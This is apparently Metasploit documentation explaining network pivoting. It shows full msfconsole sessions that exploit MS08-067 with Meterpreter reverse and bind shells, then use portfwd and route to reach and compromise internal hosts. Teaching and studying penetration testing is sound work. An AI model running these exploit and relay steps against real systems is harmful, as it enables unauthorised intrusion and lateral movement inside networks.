Pivoting¶
The Metasploit Framework supports a basic version of pivoting through the Meterpreter payload. Pivoting support is limited to Windows targets and only supports outbound TCP connections. As of version 3.3.2 the pivoting functionality in Metasploit is robust enough for common tasks. The first step to using pivoting is to gain access to a system using the Meterpreter payload. The example below demonstrates the process for exploiting the MS08-067 Server Service flaw on a Windows XP system.
$ msfconsole msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 192.168.0.136 msf exploit(ms08_067_netapi) > set LPORT 4444 msf exploit(ms08_067_netapi) > set RHOST 192.168.0.141 msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on port 4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Unknown [*] Selected Target: Windows XP SP0/SP1 Universal [*] Triggering the vulnerability... [*] Sending stage (723456 bytes) [*] Meterpreter session 1 opened (192.168.0.136:4444 -> 192.168.0.141:1042) meterpreter >
Once a meterpreter sessions is active, we have the ability to relay TCP connections through the target machine. If you compromised an internal system and would like to gain access to an internal web server, the portfwd command would do the trick:
meterpreter> portfwd add -l 8000 -p 80 -r 10.0.0.1 [*] Local TCP relay created: 0.0.0.0:8000 <-> 10.0.0.1:80
At this point a new service is exposed on the system running Metasploit that forwards all traffic to the specified host and port through the target. If we open our browser to http://127.0.0.1:8000/, our connection will be relayed across the Meterpreter session (over SSL since 3.3) and to the target server, displaying the internal web page locally. The portfwd command can be used with any TCP-based service on the target's network and is a great way to demonstrate access to internal resources once an internal user's machine has been compromised.
Instead of using the portfwd command directly, we can use the route command built into the Metasploit console. First we need to place the Meterpreter session into the background:
metepreter> background msf>
Then we use the route command to tell that framework that all communications should be relayed through the meterpreter session
msf> route add 0.0.0.0 0.0.0.0 1
We can verify the route is working using the connect command from the console
msf> connect 10.0.0.1 80 GET / HTTP/1.0 HTTP/1.0 200 OK < html data >
Once a route has been created, we can relay attacks through the established meterpreter session and compromise internal machines. Since the pivoting feature only supports outbound TCP connections, we will need to use the bind_tcp stagers if the internal machine does not have direct access to the attacking system. In most cases, where the network has no egress filters, the reverse_tcp stagers will work fine (make sure LHOST is your real external IP address). The example below demonstrates the compromise of an internal machine through a relayed session.
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > set LPORT 8989 msf exploit(ms08_067_netapi) > set RHOST 10.0.0.2 msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows 2000 Service Pack 4 with MS05-010+ - lang:English [*] Selected Target: Windows 2000 Universal [*] Triggering the vulnerability... [*] Sending stage (723456 bytes) [*] Meterpreter session 2 opened (192.168.0.136-192.168.0.141:0 -> 10.0.0.2:8989) meterpreter >